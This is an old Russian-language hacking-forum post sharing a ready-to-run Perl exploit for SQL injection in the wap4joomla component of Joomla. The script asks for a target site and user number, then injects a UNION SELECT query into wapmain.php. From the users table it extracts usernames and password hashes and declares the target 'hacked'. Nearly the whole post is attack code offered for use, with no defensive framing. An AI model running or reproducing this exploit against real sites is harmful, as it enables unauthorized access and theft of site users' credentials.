23.07.2008, 22:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
С нами:
9389186
Репутация:
573
|
|
Продукт-Joomla
Компонент -wap4joomla
found by ImpLex & Microsoft Sam
exploit
Код:
#!/usr/bin/perl -w
print
"\t\t
################################################################
############ This exploit created by ImpLex ICQ: 444-979 #######
############ from WHACK.RU #######
############ WHACK.RU #######
############ wapmain.php remote sql injection exploit #######
############ LETS GO!!!! #######
################################################################\n\n";
use LWP::UserAgent;
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
chomp(my $table1=<STDIN>);
print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
print "\n[+] User;password : $1";
print "\n[+] password = md5(md5:salt) or md5";
print "\n[+] target has been hacked";
print "\n[+] If password-md5(md5:salt) => Then user - admin";
print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
|
|
|